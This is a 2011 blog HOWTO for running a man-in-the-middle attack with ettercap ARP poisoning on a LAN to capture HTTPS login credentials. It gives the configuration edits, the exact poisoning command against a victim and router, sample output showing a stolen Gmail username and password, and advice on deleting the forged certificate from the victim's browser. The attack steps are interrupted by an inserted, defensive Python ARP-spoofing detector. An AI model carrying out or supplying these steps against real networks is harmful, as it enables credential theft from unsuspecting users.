Saturday, May 28, 2011

HOWTO : Sniffing SSL with ettercap on Back|Track 5

*** WARNING : This HOWTO is for educational purposes only. Do NOT carry out the following steps on a LAN without permission. Otherwise, you will be put in jail. ***

Sniffing SSL (https) traffic on a LAN with ettercap by means of a Man In The Middle (MITM) attack.

Step 1 :

nano /etc/etter.conf

Make the changes as follows :

[privs]
ec_uid = 0    # nobody is the default
ec_gid = 0    # nobody is the default


Uncomment the following lines :

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Step 2 :

The victim's machine is at 192.168.1.100, the router is at 192.168.1.1, and the attacker is at 192.168.1.115.

ettercap -TqM arp:remote /192.168.1.100/ /192.168.1.1/

The output on the display looks like the following :

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector "dns" not supported (etter.conf line 72)
Listening on eth0... (Ethernet)

eth0 ->    08:00:27:FF:95:DB    192.168.1.115 255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |=================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.1.100 70:1A:04:FF:0A:9A

GROUP 2 : 192.168.1.1 00:1E:10:FF:A7:E2
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help
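The poisoning started above is visible from the victim's side: the router's IP suddenly resolves to a different MAC, and one MAC claims to be both hosts. The following detector is an added example written for this post (not ettercap's code and not part of the original HOWTO); ArpReply, detect_arp_spoof and the sample replies are constructed from the addresses shown in the output above.

```python
"""Flag ARP-cache poisoning from a stream of ARP replies (hypothetical
defender-side detector, not part of ettercap or the original post).
Two signals are checked: an IP whose claimed MAC differs from the one
first learned, and a single MAC that claims more than one IP.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float   # seconds since capture start
    ip: str     # sender protocol address (who the reply claims to be)
    mac: str    # sender hardware address (where frames will really go)


def detect_arp_spoof(replies):
    """Return alert strings, in order, for suspicious replies."""
    ip_to_mac = {}                  # first MAC learned for each IP
    mac_to_ips = defaultdict(set)   # every IP each MAC has claimed
    alerts = []
    for r in replies:
        mac = r.mac.lower()
        known = ip_to_mac.get(r.ip)
        if known is None:
            ip_to_mac[r.ip] = mac
        elif known != mac:
            alerts.append(f"{r.ts:.0f}s: {r.ip} changed from {known} to {mac}")
        if r.ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(r.ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(f"{r.ts:.0f}s: {mac} claims {sorted(mac_to_ips[mac])}")
    return alerts


# Constructed sample: three legitimate replies, then the attacker's NIC
# (08:00:27:FF:95:DB in the output above) claiming the router and the victim.
SAMPLE = [
    ArpReply(0, "192.168.1.1", "00:1E:10:FF:A7:E2"),
    ArpReply(1, "192.168.1.100", "70:1A:04:FF:0A:9A"),
    ArpReply(2, "192.168.1.115", "08:00:27:FF:95:DB"),
    ArpReply(30, "192.168.1.1", "08:00:27:FF:95:DB"),
    ArpReply(30, "192.168.1.100", "08:00:27:FF:95:DB"),
]

if __name__ == "__main__":
    for line in detect_arp_spoof(SAMPLE):
        print(line)
```

Fed real replies (for example from a periodic dump of the ARP table), the first "changed from" alert for the gateway is the moment the MITM began.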


Step 3 :

At the victim's machine, open a browser such as Firefox and go to GMail. You will be asked to accept an untrusted certificate. Just accept it and you will be directed to the GMail login screen.

When the victim logs in to GMail, his/her username and password will be logged on the attacker's machine. The display will be similar to the following :

HTTP : 74.125.71.106:443 -> USER: samiux PASS: password INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/?ui=html&zy=l&bsv=llya694le36z&s

You will find USER: samiux and PASS: password in that line.

Remarks :

To delete the untrusted certificate from Firefox on the victim's machine : "Edit" -- "Preferences" -- "View Certificate List" -- "Server". You will find entries like the following. Just delete them all.

Thawte Consulting (Pty) Ltd.
www.google.com www.google.com:443 forever 2011-09-21
www.google.com mail.google.com:443 forever 2011-09-21


In general, GMail will never ask you to accept any certificate, least of all an untrusted one, so a certificate warning on GMail is itself a sign that the connection is being intercepted.

That's all! See you.